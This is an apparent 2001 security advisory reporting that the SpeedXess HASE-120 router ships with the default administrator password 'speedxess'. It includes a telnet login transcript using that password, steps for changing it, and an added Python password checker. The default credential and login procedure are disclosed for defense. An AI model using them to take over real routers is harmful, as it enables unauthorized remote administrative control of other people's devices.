
SpeedXess HASE-120 Has a Default Password


Published: 2001-12-05
Updated: 2001-12-05
Severity:
Threat level: Remote administrator privileges
Error type: Design error
Exploitation mode: Server mode

Affected Systems
SpeedXess HASE-120(IPOA Router)
Detailed Description
The SpeedXess HASE-120 router has the default password speedxess, which allows a remote user to gain system administrator access.

Test Code
telnet Target
(target: speedxess hase-120 router address)


SpeedXess HASE-120(IPOA Router) Application Start...

Welcome to HASE-120(IPOA Router) Management Interface


Enter Password: <------ master password input : speedxess

HASE-120(I) - Main Menu

[S] System
[A] Atm interface
[D] Dsl interface
[E] Ethernet interface
[I] IPOA interface
[R] Router
[X] eXit


Enter Selection: X
Do you want to exit? (Y)es, (N)o : YESSession End
Connection closed by foreign host.
[secret@secret:~]$

Solution
Workaround: change the password:

1. Connect to the router.
2. Select "S".

HASE-120(I) - Main Menu

[S] System
[A] Atm interface
[D] Dsl interface
[E] Ethernet interface
[I] IPOA interface
[R] Router
[X] eXit

Enter Selection: S


HASE-120(I) - Main Menu - System

Firmware Version HASE-120-1101
System Uptime(YYMMDDhhmmss) ??:??:??:??:??:??
Name of System Owned by Secret
Contact Name Secret Secure Lab
Location France
Ethernet Address 00:00:??:??:??:14
IP Address 211.xxx.xxx.xxx
Subnet Mask 255.255.255.xxx

[P] Password change
[F] Firmware upgrade
[S] Setting values
[R] Reset system
[I] rs-232 Interface
[A] ARP table
[X] eXit

Enter Selection:

3. Select "P" to change the password.


Enter Selection: P

Enter New Password (up to 10 characters):
Re-enter New Password:
Recording Changes. This may take a while...Done

Password is changed successfully.
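
An added example, not part of the original advisory or of any vendor code: a check for the replacement password that enforces the 10-character limit shown at the prompt above and rejects the default speedxess along with simple variations of it. The accepted character set (ASCII letters and digits), the list of vendor-derived stems and the variety threshold are assumptions.

```python
import math
import secrets
import string

# From the advisory: the default password and the 10-character prompt limit.
DEFAULT_PASSWORD = "speedxess"
MAX_LEN = 10
# Assumption: the device accepts ASCII letters and digits.
ALPHABET = string.ascii_letters + string.digits
# Undo common character substitutions before comparing against weak stems.
LEET = str.maketrans("013457@$", "oieastas")
# Assumption: vendor/model words that would be guessed first.
WEAK_STEMS = (DEFAULT_PASSWORD, "speedx", "hase", "ipoa")


def normalize(password):
    """Lower-case, undo simple substitutions, drop non-alphanumerics."""
    folded = password.lower().translate(LEET)
    return "".join(ch for ch in folded if ch.isalnum())


def check(password):
    """Return the reasons a password is unacceptable (empty list = OK)."""
    problems = []
    if not 1 <= len(password) <= MAX_LEN:
        problems.append("length")
    if any(ch not in ALPHABET for ch in password):
        problems.append("charset")
    if any(stem in normalize(password) for stem in WEAK_STEMS):
        problems.append("vendor-derived")
    if len(set(password)) < 6:
        problems.append("low-variety")
    return problems


def generate():
    """Random password that uses all 10 characters and passes check()."""
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(MAX_LEN))
        if not check(candidate):
            return candidate


def entropy_bits(length=MAX_LEN):
    """Entropy of a uniformly random password of this length, in bits."""
    return length * math.log2(len(ALPHABET))
```

With only 10 characters available, a uniformly random value from generate() gives just under 60 bits; a memorable word with substitutions gives far less.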

Related Information
profre@hanmail.net
Reference: http://archives.neohapsis.com/archives/bugtraq/2001-12/0032.html